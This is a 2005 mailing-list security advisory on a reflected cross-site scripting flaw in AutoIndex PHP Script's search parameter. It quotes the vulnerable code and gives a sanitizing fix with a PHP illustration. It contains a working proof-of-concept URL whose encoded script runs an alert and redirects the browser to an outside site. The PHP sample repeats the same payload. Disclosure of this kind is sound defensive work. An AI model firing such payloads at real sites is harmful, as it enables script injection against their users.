Date: Tue, 05 Jul 2005 22:29:24 +0000
From: mozako <mozako@...ox.it>
To: bugtraq@...urityfocus.com
Subject: Re: [badroot security] AutoIndex PHP Script: XSS vulnerability


Sorry for the distraction errors.
This is the correct ADV:

_______________________________________________________

BADROOT SECURITY GROUP
Security Advisory 2005-#0x07
http://www.badroot.org
irc.us.azzurra.org ~ #badroot
_______________________________________________________

Authors .......  mozako feat shen139
Date ..........  05-07-2005
Product .......  AutoIndex PHP Script
Type ..........  Cross Site Scripting (XSS) vulnerability

o Description:
=============================
AutoIndex PHP Script is a simple website directory indexer and file
manager.

o Vulnerability Description:
=============================
287    [...]
288    $search = (isset($_GET['search']) ? $_GET['search'] : '');
289    $search_mode = (isset($_GET['searchMode']) ? $_GET['searchMode'] : '');
290    [...]

At line 289 AutoIndex PHP Script does not validate the '$_GET' variable
($search) before it is written back into the page.
Consequently, a remote user can create a specially crafted URL that
executes arbitrary script code in a user's browser within the trust
relationship between the browser and the server.

o Products:
=============================
    - AutoIndex PHP Script v. 1.5.2 (tested)

o Solution:
=============================
Sanitize the value before writing it into the HTML output, e.g. with a simple htmlspecialchars(...) call.
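As an added illustration (not AutoIndex's own code), the unsanitized read from lines 288-289 beside the hardened form the advisory suggests. The rendering functions, the single-quoted value attribute as the output sink, and the sample input (the decoded search parameter from the PoC URL below) are assumptions, since the page does not show where $search is echoed.

```php
<?php
// Added example, not code from AutoIndex PHP Script or the advisory authors.
// Assumed sink: $search is echoed back into a single-quoted HTML attribute,
// which matches the "'>" prefix of the advisory's proof-of-concept URL.

// Constructed sample input standing in for $_GET['search'] (decoded PoC value).
$search_input = "'><script>alert('owned');</script>";

// --- vulnerable form: mirrors the behaviour described at line 288/289 ---
function render_search_box_vulnerable(string $search): string
{
    // The raw value is dropped into the attribute. A single quote in the
    // input closes the attribute, '>' closes the tag, and anything that
    // follows is parsed by the browser as page markup.
    return "<input type='text' name='search' value='" . $search . "'>";
}

// --- hardened form: the advisory's htmlspecialchars() fix ---
function render_search_box_fixed(string $search): string
{
    // ENT_QUOTES escapes both ' and ", so the value cannot terminate an
    // attribute delimited with either; < and > become &lt; and &gt;.
    // Passing the charset explicitly avoids relying on the default_charset ini value.
    $safe = htmlspecialchars($search, ENT_QUOTES, 'UTF-8');
    return "<input type='text' name='search' value='" . $safe . "'>";
}

// Defender-side check: after escaping, nothing that came from the user may
// still contain a raw '<'. $prefix is the fixed template text before the value.
function value_contains_raw_markup(string $html, string $prefix): bool
{
    $user_part = substr($html, strlen($prefix));
    return strpos($user_part, '<') !== false;
}

$prefix = "<input type='text' name='search' value='";

echo render_search_box_vulnerable($search_input), PHP_EOL;
echo render_search_box_fixed($search_input), PHP_EOL;

// The vulnerable rendering leaks raw markup; the hardened one does not.
var_dump(value_contains_raw_markup(render_search_box_vulnerable($search_input), $prefix));
var_dump(value_contains_raw_markup(render_search_box_fixed($search_input), $prefix));
```

The same escaping must be applied to $search_mode and to every other request parameter that is reflected into the page, not only to the one named in the advisory.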

o Proof of concept:
=============================
http://www.vuln-site.org/index.php?search='>%3Cscript%3Ealert%28%27owned%27%29%3Blocation.href%3D%27http%3A%2F%2Fwww.badroot.org%27%3B%3C%2Fscript%3E&dir=&searchMode= 


Original ADV: http://www.badroot.org/advisories/SA0x07

